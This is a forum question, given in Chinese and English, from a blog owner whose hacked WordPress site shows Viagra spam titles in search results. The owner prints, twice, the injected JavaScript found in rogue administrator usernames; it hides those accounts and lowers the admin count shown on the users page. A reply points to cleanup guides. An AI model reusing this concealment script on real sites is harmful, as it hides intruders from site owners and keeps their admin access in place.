如何从脚本中查找并清除 WordPress 中的脚本,这些脚本会使用令人尴尬的“伟哥文本”更改您在 Google 和 Yahoo 上的博客文章标题?
在成功防御大规模 DDoS 攻击一天后,http://arabcrunch.com 遭到黑客攻击,该人似乎将帖子标题更改为 Google 搜索引擎上的伟哥广告,看看他们如何损害我们:
www.google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy +Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=
以及此处:
google.com/search ?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=
我们所做的是使用干净的插件进行干净的 WP 安装,并导入包含旧帖子和所有页面的数据库。然后手动添加我们需要的每个 puglin,然后重建 sitemap.xml
但现在我们注定要失败,因为您搜索的任何关键字都会在 google 上获得结果,标题为:Viagra Online Pharmacy - 在线购买 Viagra、Cialis、Levitra
我在数据库表 wp_usermeta user_id: 16 用户名是一个脚本:
<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode; };
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t); } }
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\) </gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } }
}catch(e){};
}; addLoadEvent(setUserName); </script>
这是对黑客的微笑,ArabCrunch EN 以及数千个 WP 博客在 2009 年 9 月 9 日遭受了损失 阅读相关内容并链接到此处的解决方案: arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html
安装后我们发现 2 个新用户: wordpress.org 和系统,两者都设置为管理员,并且具有相同的脚本设置作为其用户名:
<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script></div>
知道如何解决这个问题吗?
One day after managing to defend against a massive DDoS attack now http://arabcrunch.com is hacked by someone who seems to change the posts title into Viagra ad on google search engine look how they damaged us:
www.google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy+Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=
and here:
google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=
What we did is a clean WP install with clean pluggins and imported our DB with old posts and all pages. then added each puglin we need manually then rebuilt the sitemap.xml
but Now we are doomed as any key word you search will get the result on google withe the title: Viagra Online Pharmacy - Buy Online Viagra, Cialis, Levitra
I found out on the DB table wp_usermeta user_id: 16 that the username is a script:
<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode; };
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t); } }
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\) </gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } }
}catch(e){};
}; addLoadEvent(setUserName); </script>
This is smiler to a hack ArabCrunch EN along with thousands of WP blogs suffered on 9 9 2009
read about it and links to solutions here:
arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html
After the install we found 2 new users:
wordpress.org and system, both are set as admin and have the same script set as their user name:
<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script></div>
Any idea how to solve this?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
在将数据库导入新的 WP 安装之前导出并清理数据库:请参阅常见问题解答:我的网站被黑了 « WordPress Codex< /a> 和 如何-完全清理你的被黑的wordpress安装。
Export and clean your database before you import it into a new WP install: see FAQ: My site was hacked « WordPress Codex and how-to-completely-clean-your-hacked-wordpress-installation.